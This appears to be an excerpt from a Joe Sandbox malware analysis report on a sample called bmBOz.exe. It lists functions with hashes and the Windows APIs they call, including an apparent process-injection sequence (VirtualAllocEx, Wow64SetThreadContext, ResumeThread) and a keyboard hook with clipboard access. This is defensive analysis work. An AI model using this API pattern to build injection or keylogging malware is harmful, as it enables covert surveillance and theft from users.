Opcode ID: 01728224ea4d9900fe5c5c400c6a40cf3d7bd4bc26b30605365a7f82d461a0e3
Instruction ID: 0d8c3bbed68f5d7bf09ba8a2d7210a0c14934a69cd18e19e7304583eb5f5d42e
Opcode Fuzzy Hash: 01728224ea4d9900fe5c5c400c6a40cf3d7bd4bc26b30605365a7f82d461a0e3
Instruction Fuzzy Hash: 812136B1C10359AFDB14DFAAC880BEEBBF5FF48310F10842AE558A7240C7399541DBA5

Function 072AF6A0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072AF726

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: dafa66e7b768d7e8e3100575cea45269cd3b9a9a1e5aa6cfa3a5a6ab21a5b3d2
Instruction ID: 06d520df45753de74d67b191893922dbbc6b0b5334bf5c2fa48a431dfdebdda6
Opcode Fuzzy Hash: dafa66e7b768d7e8e3100575cea45269cd3b9a9a1e5aa6cfa3a5a6ab21a5b3d2
Instruction Fuzzy Hash: F92178B1C103099FDB10DFAAC480BEEBBF4EF48310F10842EE418A7240CB789945CBA4

Function 072AF6A8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072AF726

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7fef59ba5503fd7bde547b7159344ff5e176a38fec9060ef8cf171b3a1785b80
Instruction ID: 34ef3f61f76ab718718505ec6eccf8c683ddd26b2667f1319a490ce45573af41
Opcode Fuzzy Hash: 7fef59ba5503fd7bde547b7159344ff5e176a38fec9060ef8cf171b3a1785b80
Instruction Fuzzy Hash: 9B2157B1D103099FDB14DFAAC484BEEBBF4EF48310F10842AE458A7240CB789944CBA4

Function 072AF930 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072AF9B0

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 884ff70408509c9a80880b5e2e2be230905cd3aa974907eb39717a06197919fb
Instruction ID: 662b0eaceef4648b6a84b5e3cb7c7e974b19f6b96785244ff970a171dbe26758
Opcode Fuzzy Hash: 884ff70408509c9a80880b5e2e2be230905cd3aa974907eb39717a06197919fb
Instruction Fuzzy Hash: 062114B1C003599FDB14DFAAC880BEEBBF5FF48310F10842AE958A7240C7399940CBA5

Function 013EE020 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013EE0A7

Memory Dump Source

Source File: 00000016.00000002.1694131613.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13e0000_bmBOz.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c8b0b350281e7a13a795378bf5e9f66bd03c1c3e73dd14a337bfe3e402e5b209
Instruction ID: fea47d97b092bdc035044f25096a7566e241982718956bfccae6bcb5e150e0bf
Opcode Fuzzy Hash: c8b0b350281e7a13a795378bf5e9f66bd03c1c3e73dd14a337bfe3e402e5b209
Instruction Fuzzy Hash: F921E3B5900258DFDB10CF9AD484ADEBBF4EB48314F14801AE918A7350C379A944CF65

Function 072AF77A Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072AF7EE

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aca7f7a6501e34ddf725df56314b14893e31d734c72e1d4846ce4af1d875b93f
Instruction ID: 0c18e4145f28bce82f99e63cdbcfe6b4a69e90436e34d29f063eb71e4fada492
Opcode Fuzzy Hash: aca7f7a6501e34ddf725df56314b14893e31d734c72e1d4846ce4af1d875b93f
Instruction Fuzzy Hash: CB1159768002899FDB24CFAAC844BEEBBF1EF88320F24841AE555A7650C7399501CF94

Function 072AF1B8 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 072AF222

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4fa9da3021868e1e1c8f952455996212f4b870a3773d218c21339d00abf65a38
Instruction ID: 57bc45a53171870993b1739ec8c9662fa1ead9bee5d736d6e315359c0aab1980
Opcode Fuzzy Hash: 4fa9da3021868e1e1c8f952455996212f4b870a3773d218c21339d00abf65a38
Instruction Fuzzy Hash: 98116AB5D003499FDB24DFAAD444BDEFBF4EB48324F20841ED519A7640CB39A941CB99

Function 072AF780 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072AF7EE

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: febcf85075fd54f7075031b39ae7ac280c740dcc1586d984aa762957aa5b7a05
Instruction ID: 4babb8ee59eda0818a5804e038aa0368940492df8973faf62ce72e65dcbfb1b2
Opcode Fuzzy Hash: febcf85075fd54f7075031b39ae7ac280c740dcc1586d984aa762957aa5b7a05
Instruction Fuzzy Hash: 1F1137768003499FDB24DFAAC844BEEBBF5EF48320F24841AE515A7650CB799940CFA5

Function 072AF1C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 072AF222

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0b35a1d01c360582e2f385cb9aafe77d9239f50fc81b1f7076f02cbb191b0151
Instruction ID: 563bad56b8d8892c2fee5c1d724d5b3e3c20b0e51b5e27bda1ad6b513d4affa6
Opcode Fuzzy Hash: 0b35a1d01c360582e2f385cb9aafe77d9239f50fc81b1f7076f02cbb191b0151
Instruction Fuzzy Hash: E0113AB5D003498FDB24DFAAC444BDEFBF4EB48324F24841DD519A7640CB79A540CB95

Function 013EBD40 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013EBDA6

Memory Dump Source

Source File: 00000016.00000002.1694131613.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13e0000_bmBOz.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 69b353fc30cfdfbb038362e4accc7f9016c5aa54e8f24121dc7746d6973b741c
Instruction ID: 23cb35f146aaee331983eb9df3a3dcf56dbea2ffe52b461029afc3596db0bd62
Opcode Fuzzy Hash: 69b353fc30cfdfbb038362e4accc7f9016c5aa54e8f24121dc7746d6973b741c
Instruction Fuzzy Hash: 9F1102B6C003598FDB14DF9AC444ADEFBF4EF88214F10841AD818A7650C37AA545CFA5

Function 0130D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693734925.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_130d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5b6a166f001c44415b00e907fc0161b4e1de69ce962cb6c260e93570b4a94f
Instruction ID: 948f324056a3b9685c0457ce7039be8cfb71d82926bca31d9695cf36573db235
Opcode Fuzzy Hash: df5b6a166f001c44415b00e907fc0161b4e1de69ce962cb6c260e93570b4a94f
Instruction Fuzzy Hash: 9A214872500204DFDB16DF94D9C0B66BFE5FB84328F20C16DE90A1F296C736E446CAA2

Function 0131D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693819495.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_131d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631116deeee0ee4fedefdc6b061a83f3d9d73c7e93a3b8da6dd7010e9e2ab6b5
Instruction ID: 31e595b39907a8c2344ce488add2aae93c99e8f92e5bca96eaa96054ff7946d8
Opcode Fuzzy Hash: 631116deeee0ee4fedefdc6b061a83f3d9d73c7e93a3b8da6dd7010e9e2ab6b5
Instruction Fuzzy Hash: 30214971504304EFDB19DF94D5C8B65BBA5FB85328F20C66DE8094F69AC336D407CA61

Function 0131D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693819495.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_131d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db28463dc229bb661a8b570cb14cf03c2dfd0d4584627930d036009c1a5681b
Instruction ID: 52ad2e44b0764711ccf4c0b3d525a9e954fbe62acd91e983f59b1cdc56522a05
Opcode Fuzzy Hash: 7db28463dc229bb661a8b570cb14cf03c2dfd0d4584627930d036009c1a5681b
Instruction Fuzzy Hash: 06212575504304EFDB19DF64D9C8B16BB65FB85318F20C56DE80A0F69AC336D447CA62

Function 0130D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693734925.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_130d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: f2dc2e374e1a2245e9cc14f89b2f81350bba4d432a796ace766001e1d528b207
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 371103B2404240DFDB16CF84D5C0B56BFB1FB84324F24C6A9D9090B697C33AE456CBA2

Function 0131D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693819495.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_131d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: cc57b7e94e995247f699d140bf2701c7df50f8c15eea8123b6e6549bfd834d45
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: BD11BE75504280DFDB16CF54D5C4B15FF61FB45318F24C6A9D8094B69AC33AD44ACB62

Function 0131D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693819495.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_131d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: ef14428bffb8747d8134081d3e32f3797fe29b01bfd4f592430a27193fd2c19f
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 6911BB75904280DFDB1ACF54D5C4B15FFB1FB85328F24C6A9D8494B69AC33AD40ACB62

Function 0130D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693734925.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_130d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f3e69bf1a22e4d9037d462fbd514cc8392a34c477dd8355ddcaf9646e227c9
Instruction ID: 2f72ed2f9981053e3bf3f6293aea0f4502e2e4c9340fc5dc2d99f1120b4b4d11
Opcode Fuzzy Hash: 79f3e69bf1a22e4d9037d462fbd514cc8392a34c477dd8355ddcaf9646e227c9
Instruction Fuzzy Hash: C701F7310043849AF7224FE9CD94B66BFDCEF41A28F04851AED090F6C2C2799441CAB2

Function 0130D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1693734925.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_130d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee83f8afaccae8cb4f55cd806a4e1db01d088e521c8b91f54d18447b0351bf52
Instruction ID: 1d514b430303c1925cb6c0c03b469603ec140e5cdc53da9058e37f156c51ef27
Opcode Fuzzy Hash: ee83f8afaccae8cb4f55cd806a4e1db01d088e521c8b91f54d18447b0351bf52
Instruction Fuzzy Hash: D9F06271405384AEE7258E59C988B62FFD8EB81A34F18C55AED084F2C7C2799844CAB1

Analysis Process: bmBOz.exePID: 4516, Parent PID: 4428COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.6%
Total number of Nodes:	462
Total number of Limit Nodes:	54

Executed Functions

Function 06AAA7F8 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.3948589716.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6aa0000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d80a7bf584ecc1b4b6196d0e279bd320b0e8b85656e5c1489dcdef4e240a05a8
Instruction ID: 88c9031476415fc39c154a764f88debc4e5c7aa158ecdef59630b1a4f6fc8342
Opcode Fuzzy Hash: d80a7bf584ecc1b4b6196d0e279bd320b0e8b85656e5c1489dcdef4e240a05a8
Instruction Fuzzy Hash: BFF13930A003098FEB54EFA9C944BADBBF2FF48304F15815AE905AF295DB75E945CB80

Function 06A38A88 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06A398B8,00000000,00000000), ref: 06A3BB13

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 7c657e914adebf81b890db64780d55131201c473a98750a821570588ccde3aea
Instruction ID: 26648276c6b2c43a8ddf56188f041f63f05d38aa519ec9dfc0e4f109121b023c
Opcode Fuzzy Hash: 7c657e914adebf81b890db64780d55131201c473a98750a821570588ccde3aea
Instruction Fuzzy Hash: 34213375D002189FDB54DF9AC884BEEFBF5FB88310F10842AE419AB250CB75A940CFA1

Function 06A324C9 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06A32556
GetCurrentThread.KERNEL32 ref: 06A32593
GetCurrentProcess.KERNEL32 ref: 06A325D0
GetCurrentThreadId.KERNEL32 ref: 06A32629

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e23b67f3ed08f6eda12d45e25915647d2a6edcb4382b89c04f8b192222ac79cf
Instruction ID: 5f866828df59d90948ccc2aad0833d4515bd1a17c7138c38a2c518523912156d
Opcode Fuzzy Hash: e23b67f3ed08f6eda12d45e25915647d2a6edcb4382b89c04f8b192222ac79cf
Instruction Fuzzy Hash: 035169B49003499FEB54EFA9D948BDEBBF1EF88304F208059E009AB390D7355A45CF65

Function 06A324D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06A32556
GetCurrentThread.KERNEL32 ref: 06A32593
GetCurrentProcess.KERNEL32 ref: 06A325D0
GetCurrentThreadId.KERNEL32 ref: 06A32629

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 045b416daffcd1c05240604b4c7cf155bce73d83f463895262ca0b3d0c67b878
Instruction ID: 18cb8335c203bac32d7dbefce448b40a70ff1c082f0bcc5437dfd03bc287883c
Opcode Fuzzy Hash: 045b416daffcd1c05240604b4c7cf155bce73d83f463895262ca0b3d0c67b878
Instruction Fuzzy Hash: 1D5148B4900609CFEB54EFA9D948B9EBBF1EF88304F208059E019AB390D7359A45CF65

Function 0280B82C Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0280B7F6

Memory Dump Source

Source File: 00000019.00000002.3910795145.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2800000_bmBOz.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f546c13f8efa74580011929a5cea9ab666120a8c7c6edf5932941d7f113be868
Instruction ID: 6d433bad03ed4b7baea365a52c51d25e4ec53a46e35a2b3b6d5a2c27415d0511
Opcode Fuzzy Hash: f546c13f8efa74580011929a5cea9ab666120a8c7c6edf5932941d7f113be868
Instruction Fuzzy Hash: 095154B9D002488FDB14CFA9D8847DEBBF1EF08318F24852AE859E7291D3799445CF96

Function 0280D87C Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0280D99A

Memory Dump Source

Source File: 00000019.00000002.3910795145.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2800000_bmBOz.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6b424d6f7b75e6eaf5ad0e34777137ff702fc95403b48dfdfb87f8c84de95516
Instruction ID: c0d7f9546d582fc3478294e4e85678820d3a42afc6cde6ccb1f561d527815287
Opcode Fuzzy Hash: 6b424d6f7b75e6eaf5ad0e34777137ff702fc95403b48dfdfb87f8c84de95516
Instruction Fuzzy Hash: 6751CCB5D00348DFDB14CFAAD884ADEBBB1FF48314F24862AE819AB254D7759845CF90

Function 0280D888 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0280D99A

Memory Dump Source

Source File: 00000019.00000002.3910795145.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2800000_bmBOz.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5cc7a5322c266d3f5484ff8015ed8b5d4a2afc8477111a753aed38b29383cf26
Instruction ID: d656b1ff9316dece29e2ceac88d6990c6173535683a83383233813bf3bf10d2c
Opcode Fuzzy Hash: 5cc7a5322c266d3f5484ff8015ed8b5d4a2afc8477111a753aed38b29383cf26
Instruction Fuzzy Hash: 5C41BCB5D003089FDB14CF9AC884ADEBBB5FF48314F24822AE819AB254D775A845CF90

Function 06A322A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06A33B99

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a88422fd306caff7995617c35e5de8afdd73eca0864b73a5bd40862be0a5a03b
Instruction ID: c738ec8f29abd4d82a1f37b1426319f143dbc3ed8210eb0e67a72b745e34b85c
Opcode Fuzzy Hash: a88422fd306caff7995617c35e5de8afdd73eca0864b73a5bd40862be0a5a03b
Instruction Fuzzy Hash: DB4169B9904744CFDB54DF89C488AAABBF5FF88310F24C859E419AB361D335A840CFA0

Function 06A37BEF Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06A37C80

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: bf8e15cfe7dcb455b94992cb1443f73cd7d73ab468eb88e38d026f40fb3a9649
Instruction ID: 4cd18c284c6fc0b696ee19c7a6bdad295376e6c9dc186a906eda7b2988bbee34
Opcode Fuzzy Hash: bf8e15cfe7dcb455b94992cb1443f73cd7d73ab468eb88e38d026f40fb3a9649
Instruction Fuzzy Hash: 303102B0D01358EFEB54DF99D984BCEBBF5BF48304F208019E404AB290D775A945CBA9

Function 06A37BF8 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06A37C80

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: eb1af779e26d40121c146ea625903209ed6ea0cc919e2140b29ad353d3d40770
Instruction ID: b9bb39eb7e0b01480f2bcbd18868eb3adc266103c6942fe9153b6e896062c4af
Opcode Fuzzy Hash: eb1af779e26d40121c146ea625903209ed6ea0cc919e2140b29ad353d3d40770
Instruction Fuzzy Hash: 5631E0B0D01358DFEB54DF99D984BCEBBF5BF48304F208019E404AB290D7B5A945CB59

Function 06A3209C Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A32977

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8d8d945e453788fc85dce5ecacddd625b2bf3c7049fddf1e0789912957daad8f
Instruction ID: e8516093b55cd73d2f11e215c2477919e9fe12990139b9d0037464e2673560c5
Opcode Fuzzy Hash: 8d8d945e453788fc85dce5ecacddd625b2bf3c7049fddf1e0789912957daad8f
Instruction Fuzzy Hash: 4621D4B5900259EFDB10CFAAD584BDEBBF4EB48310F14801AE914A7350D375A940CFA5

Function 06A328E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A32977

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d5f1c973d4b064c639d9525d9efcb0b82d76bea6b2fce8cf8d0dd2affbca9d83
Instruction ID: 122b9b565f282b337bdd2a8a53773411c1151d04a221d29129a2a6a62b5d4843
Opcode Fuzzy Hash: d5f1c973d4b064c639d9525d9efcb0b82d76bea6b2fce8cf8d0dd2affbca9d83
Instruction Fuzzy Hash: D021E5B5D00249EFDB10CFAAD984ADEBBF9FB48310F14841AE954A7350D379A940CF65

Function 06A3BA90 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06A398B8,00000000,00000000), ref: 06A3BB13

Memory Dump Source

Source File: 00000019.00000002.3947446401.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6a30000_bmBOz.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 1906d0bfc9b67c89c8d7894ada8256eb1cb8bdb9b63c31d8728c57588fc35d1a
Instruction ID: d556eb6b246ed5a7b2b14a1fa2e4a2293ddeeb35af50951a262127b33e5bb48e
Opcode Fuzzy Hash: 1906d0bfc9b67c89c8d7894ada8256eb1cb8bdb9b63c31d8728c57588fc35d1a
Instruction Fuzzy Hash: 4A213575D002089FDB14DF9AD844BEEFBF5FB88310F10842AE419AB250CB75A940CFA1

Function 06E7807E Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 06E780E7

Memory Dump Source

Source File: 00000019.00000002.3950381184.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6e70000_bmBOz.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: aedfb3708fb71bd0937f78105611197168d66adfc916799ae010e550bb7a7560
Instruction ID: d3dc04e376aac3e0e5c765553d11e9cca2352db82b0286de9e3bdbf00dea2708
Opcode Fuzzy Hash: aedfb3708fb71bd0937f78105611197168d66adfc916799ae010e550bb7a7560
Instruction Fuzzy Hash: 5A1114B1C006599FDB10CF9AC444BDEFBF4AF48210F10812AE818A7240D779A941CFA5

Function 06E78080 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 06E780E7

Memory Dump Source

Source File: 00000019.00000002.3950381184.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6e70000_bmBOz.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 4c0aa4e977fdbf898c647875bdb9438443c0855c21ccf232c2ad613bef4b90b1
Instruction ID: d1c1c25cffb1feaa10e6aeefc2c012f64882b8a14e24fc5a0c3588604eedf271
Opcode Fuzzy Hash: 4c0aa4e977fdbf898c647875bdb9438443c0855c21ccf232c2ad613bef4b90b1
Instruction Fuzzy Hash: 361112B2C0065A9FDB10CF9AC444BDEFBF4AF48220F10812AE818A7240D778A941CFA5

